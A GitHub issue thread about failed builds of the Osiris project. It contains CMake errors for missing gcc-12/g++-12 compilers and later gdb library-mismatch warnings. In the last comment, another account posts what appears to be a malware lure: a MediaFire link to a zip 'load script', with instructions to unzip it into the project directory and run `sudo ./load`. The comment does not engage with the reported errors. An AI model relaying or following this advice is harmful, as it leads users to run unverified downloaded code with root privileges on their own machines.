### ISSUE TITLE
make: *** No targets specified and no makefile found. Stop.

### ISSUE THREAD

**Issue by ba-mirza** [danielkrupinski/Osiris#4066]
Not working

makefile not created

**Comment by ba-mirza** [comment]
I have the next error:

-- The C compiler identification is unknown
-- The CXX compiler identification is unknown
CMake Error at CMakeLists.txt:2 (project):
  The CMAKE_C_COMPILER:

    gcc-12

  is not a full path and was not found in the PATH.

  Tell CMake where to find the compiler by setting either the environment
  variable "CC" or the CMake cache entry CMAKE_C_COMPILER to the full path to
  the compiler, or to the compiler name if it is in the PATH.


CMake Error at CMakeLists.txt:2 (project):
  The CMAKE_CXX_COMPILER:

    g++-12

  is not a full path and was not found in the PATH.

  Tell CMake where to find the compiler by setting either the environment
  variable "CXX" or the CMake cache entry CMAKE_CXX_COMPILER to the full path
  to the compiler, or to the compiler name if it is in the PATH.


-- Configuring incomplete, errors occurred!
See also "/home/almas/Desktop/Orion/Osiris/Release/CMakeFiles/CMakeOutput.log".
See also "/home/almas/Desktop/Orion/Osiris/Release/CMakeFiles/CMakeError.log".
make: *** No targets specified and no makefile found.  Stop.
mv: cannot stat 'libOsiris.so': No such file or directory

**Comment by ba-mirza** [comment]
I solved the problem above

But, now i have the next problem:

warning: .dynamic section for "/lib/x86_64-linux-gnu/libstdc++.so.6" is not at the expected address (wrong library or version mismatch?)

warning: .dynamic section for "/lib/x86_64-linux-gnu/libgcc_s.so.1" is not at the expected address (wrong library or version mismatch?)

warning: Could not load shared library symbols for bin/linux64/launcher_client.so.
Do you need "set solib-search-path" or "set sysroot"?
78	../sysdeps/unix/sysv/linux/clock_nanosleep.c: No such file or directory.

**Comment by ItsNeverTooColdForIceCream** [comment]
try @ReShout876 's [load script](https://www.mediafire.com/file/kqorwt0eu0tr1cz/reshout%2527s_load_script.zip/file)
I had the same problem and it fixed it immediately. 
Just unzip all files into Osiris directory, then `chmod +x ./load` and `sudo ./load`
